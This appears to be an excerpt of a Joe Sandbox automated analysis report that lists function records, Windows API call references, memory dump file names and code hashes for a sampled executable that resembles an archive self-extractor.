                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                      • String ID:
                                                                                                      • API String ID: 1269201914-0
                                                                                                      • Opcode ID: 1181f1ae93be93865e3c943a1cd23b9194f77b93ec58ebd65eee7f2a0bbec2a8
                                                                                                      • Instruction ID: 351797992654dcd18d2339a949de4c7d6b9971a29df37918c1e3e60562ab519d
                                                                                                      • Opcode Fuzzy Hash: 1181f1ae93be93865e3c943a1cd23b9194f77b93ec58ebd65eee7f2a0bbec2a8
                                                                                                      • Instruction Fuzzy Hash: 99A011A22AA00BBEF008A3003E02C3B022CE0C0BB03B08A2EB802800C2A88808808830
                                                                                                      APIs
                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A0C799
                                                                                                        • Part of subcall function 00A0CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0CB39
                                                                                                        • Part of subcall function 00A0CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0CB4A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                      • String ID:
                                                                                                      • API String ID: 1269201914-0
                                                                                                      • Opcode ID: 7cb9e797fa9a3c9f97d9412a0d3bbd63685606f7d3d3d1d290e6bd3ac571000b
                                                                                                      • Instruction ID: 351797992654dcd18d2339a949de4c7d6b9971a29df37918c1e3e60562ab519d
                                                                                                      • Opcode Fuzzy Hash: 7cb9e797fa9a3c9f97d9412a0d3bbd63685606f7d3d3d1d290e6bd3ac571000b
                                                                                                      • Instruction Fuzzy Hash: 99A011A22AA00BBEF008A3003E02C3B022CE0C0BB03B08A2EB802800C2A88808808830
                                                                                                      APIs
                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A0C738
                                                                                                        • Part of subcall function 00A0CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0CB39
                                                                                                        • Part of subcall function 00A0CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0CB4A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                      • String ID:
                                                                                                      • API String ID: 1269201914-0
                                                                                                      • Opcode ID: 205626ae9110e35c26df570420f5cade3b31c8ddae2edac6213e3fb166acb3a2
                                                                                                      • Instruction ID: 37e6242e19053a235a72390e20b7a9b6fae30dbf15dc99bc8d8d8e46774f2ba5
                                                                                                      • Opcode Fuzzy Hash: 205626ae9110e35c26df570420f5cade3b31c8ddae2edac6213e3fb166acb3a2
                                                                                                      • Instruction Fuzzy Hash: 11A011A22AA20ABCF008A3003E02C3B022CC0C0BB03308A2EB802A00C2A88008000230
                                                                                                      APIs
                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A0C738
                                                                                                        • Part of subcall function 00A0CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0CB39
                                                                                                        • Part of subcall function 00A0CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0CB4A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                      • String ID:
                                                                                                      • API String ID: 1269201914-0
                                                                                                      • Opcode ID: 39838e034e1b402eb15caed177b39228e7e2d5e43b269a4a7a4361d11097be8e
                                                                                                      • Instruction ID: 37e6242e19053a235a72390e20b7a9b6fae30dbf15dc99bc8d8d8e46774f2ba5
                                                                                                      • Opcode Fuzzy Hash: 39838e034e1b402eb15caed177b39228e7e2d5e43b269a4a7a4361d11097be8e
                                                                                                      • Instruction Fuzzy Hash: 11A011A22AA20ABCF008A3003E02C3B022CC0C0BB03308A2EB802A00C2A88008000230
                                                                                                      APIs
                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A0C738
                                                                                                        • Part of subcall function 00A0CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0CB39
                                                                                                        • Part of subcall function 00A0CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0CB4A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                      • String ID:
                                                                                                      • API String ID: 1269201914-0
                                                                                                      • Opcode ID: d193b2042eb2665ab16db15a6379ecabf572300011c8611113b6aa4dfefcdc5d
                                                                                                      • Instruction ID: 37e6242e19053a235a72390e20b7a9b6fae30dbf15dc99bc8d8d8e46774f2ba5
                                                                                                      • Opcode Fuzzy Hash: d193b2042eb2665ab16db15a6379ecabf572300011c8611113b6aa4dfefcdc5d
                                                                                                      • Instruction Fuzzy Hash: 11A011A22AA20ABCF008A3003E02C3B022CC0C0BB03308A2EB802A00C2A88008000230
                                                                                                      APIs
                                                                                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00A0C738
                                                                                                        • Part of subcall function 00A0CABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00A0CB39
                                                                                                        • Part of subcall function 00A0CABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00A0CB4A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                      • String ID:
                                                                                                      • API String ID: 1269201914-0
                                                                                                      • Opcode ID: abf0ddfcccdf95460ce1a7e245ff00476df4dfd066450546b4b542f9204497f3
                                                                                                      • Instruction ID: 37e6242e19053a235a72390e20b7a9b6fae30dbf15dc99bc8d8d8e46774f2ba5
                                                                                                      • Opcode Fuzzy Hash: abf0ddfcccdf95460ce1a7e245ff00476df4dfd066450546b4b542f9204497f3
                                                                                                      • Instruction Fuzzy Hash: 11A011A22AA20ABCF008A3003E02C3B022CC0C0BB03308A2EB802A00C2A88008000230
                                                                                                      APIs
                                                                                                      • SetEndOfFile.KERNELBASE(?,009F8EDB,?,?,-00001954), ref: 009F9B6D
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File
                                                                                                      • String ID:
                                                                                                      • API String ID: 749574446-0
                                                                                                      • Opcode ID: eda82311b1ca207c09fb42873338f5c41db33f60e185d4be36f548e3b86a2420
                                                                                                      • Instruction ID: 818ec2e310e5fe786d055348a44142990783bba398ed22bad295235d1cdf868c
                                                                                                      • Opcode Fuzzy Hash: eda82311b1ca207c09fb42873338f5c41db33f60e185d4be36f548e3b86a2420
                                                                                                      • Instruction Fuzzy Hash: DEB011300E800A8A8E202B38CC08C203A20EB2230A30082B0A00AC80A2CB22C003AA20
                                                                                                      APIs
                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,00A0927A,00A32120,00000000,00A33122,00000006), ref: 00A09027
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CurrentDirectory
                                                                                                      • String ID:
                                                                                                      • API String ID: 1611563598-0
                                                                                                      • Opcode ID: 107149c2b8e8eb5222f97100100120b95108f1458671590cadf9662a4eab0478
                                                                                                      • Instruction ID: bf3b5691e38e0cef8a8ee997f032bdcf8345fda53ce745d8aa9bbf06566dd1c2
                                                                                                      • Opcode Fuzzy Hash: 107149c2b8e8eb5222f97100100120b95108f1458671590cadf9662a4eab0478
                                                                                                      • Instruction Fuzzy Hash: 50A0123019410646CA104B34CC09C2576505760702F0087307002C00A0CB308821E500
                                                                                                      APIs
                                                                                                      • CloseHandle.KERNELBASE(000000FF,?,?,009F9473), ref: 009F94BE
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandle
                                                                                                      • String ID:
                                                                                                      • API String ID: 2962429428-0
                                                                                                      • Opcode ID: 94852f200c8a82a95f1f47c474691bfda8795338eda4fdfe444c5b7eaf376a3e
                                                                                                      • Instruction ID: a8a805d2d1f8fcd81407562fa1bc7b578487cafb660498f1974a2b45c615f09a
                                                                                                      • Opcode Fuzzy Hash: 94852f200c8a82a95f1f47c474691bfda8795338eda4fdfe444c5b7eaf376a3e
                                                                                                      • Instruction Fuzzy Hash: 63F08970646B684FDB309B24D5497A1B7EC5B21735F04871ED1E6434E0D375644E8B11
                                                                                                      APIs
                                                                                                        • Part of subcall function 009F12E7: GetDlgItem.USER32(00000000,00003021), ref: 009F132B
                                                                                                        • Part of subcall function 009F12E7: SetWindowTextW.USER32(00000000,00A202E4), ref: 009F1341
                                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00A0A5C8
                                                                                                      • EndDialog.USER32(?,00000006), ref: 00A0A5DB
                                                                                                      • GetDlgItem.USER32(?,0000006C), ref: 00A0A5F7
                                                                                                      • SetFocus.USER32(00000000), ref: 00A0A5FE
                                                                                                      • SetDlgItemTextW.USER32(?,00000065,?), ref: 00A0A63E
                                                                                                      • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00A0A671
                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00A0A687
                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00A0A6A5
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A0A6B5
                                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00A0A6D2
                                                                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A0A6F0
                                                                                                        • Part of subcall function 009FD142: LoadStringW.USER32(?,?,00000200,?), ref: 009FD187
                                                                                                        • Part of subcall function 009FD142: LoadStringW.USER32(?,?,00000200,?), ref: 009FD19D
                                                                                                      • _swprintf.LIBCMT ref: 00A0A720
                                                                                                        • Part of subcall function 009F3F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F3F6E
                                                                                                      • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00A0A733
                                                                                                      • FindClose.KERNEL32(00000000), ref: 00A0A736
                                                                                                      • _swprintf.LIBCMT ref: 00A0A791
                                                                                                      • SetDlgItemTextW.USER32(?,00000068,?), ref: 00A0A7A4
                                                                                                      • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00A0A7BA
                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00A0A7DA
                                                                                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A0A7EA
                                                                                                      • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00A0A804
                                                                                                      • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00A0A81C
                                                                                                      • _swprintf.LIBCMT ref: 00A0A84D
                                                                                                      • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00A0A860
                                                                                                      • _swprintf.LIBCMT ref: 00A0A8B0
                                                                                                      • SetDlgItemTextW.USER32(?,00000069,?), ref: 00A0A8C3
                                                                                                        • Part of subcall function 00A0932F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00A09355
                                                                                                        • Part of subcall function 00A0932F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00A2A154,?,?), ref: 00A093A4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLoadLocalStringSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                      • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                      • API String ID: 3227067027-1840816070
                                                                                                      • Opcode ID: 75e64175e59fc0e5401f120dd889ca242dcf820b7cb8ad8bdf4db7ad5c51eb4a
                                                                                                      • Instruction ID: c0c60d0957f635d5ea0d0b020bff67aadfa6158ac9fb54e37357284eea16e730
                                                                                                      • Opcode Fuzzy Hash: 75e64175e59fc0e5401f120dd889ca242dcf820b7cb8ad8bdf4db7ad5c51eb4a
                                                                                                      • Instruction Fuzzy Hash: D391927254834CBBE231DBA4DD49FFB77ACEB9A700F044829B645D60C1D771AA068B63
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 009F7075
                                                                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 009F71D5
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 009F71E5
                                                                                                        • Part of subcall function 009F7A9D: GetCurrentProcess.KERNEL32(00000020,?), ref: 009F7AAC
                                                                                                        • Part of subcall function 009F7A9D: GetLastError.KERNEL32 ref: 009F7AF2
                                                                                                        • Part of subcall function 009F7A9D: CloseHandle.KERNEL32(?), ref: 009F7B01
                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 009F71F0
                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 009F72FE
                                                                                                      • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 009F732A
                                                                                                      • CloseHandle.KERNEL32(?), ref: 009F733C
                                                                                                      • GetLastError.KERNEL32(00000015,00000000,?), ref: 009F734C
                                                                                                      • RemoveDirectoryW.KERNEL32(?), ref: 009F7398
                                                                                                      • DeleteFileW.KERNEL32(?), ref: 009F73C0
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
                                                                                                      • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                      • API String ID: 3935142422-3508440684
                                                                                                      • Opcode ID: dd55b3cc356f19a575d258231065806a86c88748746ffefc789078b279ec7f2b
                                                                                                      • Instruction ID: cb5e1fa79ad42833a7e6238fe1326a82d23ba8f1e4631c575ce28b1723a40726
                                                                                                      • Opcode Fuzzy Hash: dd55b3cc356f19a575d258231065806a86c88748746ffefc789078b279ec7f2b
                                                                                                      • Instruction Fuzzy Hash: B4B1AF71904218AFEB20DFA8DC85FFEB7B8AF44700F144569FA19E7142D770AA45CB61
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog_memcmp
                                                                                                      • String ID: CMT$h%u$hc%u
                                                                                                      • API String ID: 3004599000-3282847064
                                                                                                      • Opcode ID: 9088a55f4d8975f741741f60673ec079df126caf3ba1d8f42a5bdc6566e4367f
                                                                                                      • Instruction ID: f3e4bdb35d8f37f45d8ada6be57ecd10fb88a277627d7b9929d62df72474a24a
                                                                                                      • Opcode Fuzzy Hash: 9088a55f4d8975f741741f60673ec079df126caf3ba1d8f42a5bdc6566e4367f
                                                                                                      • Instruction Fuzzy Hash: 5832A17151468C9FDF14DF74C886BFA37A5AF54300F048579FE9A8B282DB74AA48CB60
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __floor_pentium4
                                                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                      • API String ID: 4168288129-2761157908
                                                                                                      • Opcode ID: d60ac20228fc1685377f9afbaab1a83ad96aa5f91dd4b0b6c283bcdb23778799
                                                                                                      • Instruction ID: 2057732f8f605aa0f1394050b4d8bfce13477f00d67c83477cdba5c7f3c6bfd2
                                                                                                      • Opcode Fuzzy Hash: d60ac20228fc1685377f9afbaab1a83ad96aa5f91dd4b0b6c283bcdb23778799
                                                                                                      • Instruction Fuzzy Hash: 37C23772E096288FDB25CF289D407EAB7B5EB58344F1541EAD84DE7240E778AEC18F41
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 009F2775
                                                                                                      • _strlen.LIBCMT ref: 009F2CFF
                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009F2E56
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prologUnothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                                                                      • String ID: CMT
                                                                                                      • API String ID: 3741668355-2756464174
                                                                                                      • Opcode ID: 8a15c2109994f4bcfbaf973ceb5fd95689b6b0b9c75c4862fc2c35e848b1fe08
                                                                                                      • Instruction ID: 0c1a7ea27b793d61443171d39300efe67c99a0f4ce85ff0129b56e9f3fb7caf3
                                                                                                      • Opcode Fuzzy Hash: 8a15c2109994f4bcfbaf973ceb5fd95689b6b0b9c75c4862fc2c35e848b1fe08
                                                                                                      • Instruction Fuzzy Hash: 9462E271A042888FDF18DF64C9957FA3BE5AF54300F04457EEE9A8B282D774A989CB50
                                                                                                      APIs
                                                                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00A15C4B
                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00A15C55
                                                                                                      • UnhandledExceptionFilter.KERNEL32(-00000311,?,?,?,?,?,00000000), ref: 00A15C62
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.1667335544.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.1667323676.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667357629.0000000000A20000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A2A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667371622.0000000000A4A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.1667399459.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_9f0000_file.jbxd
                                                                                                      Similarity
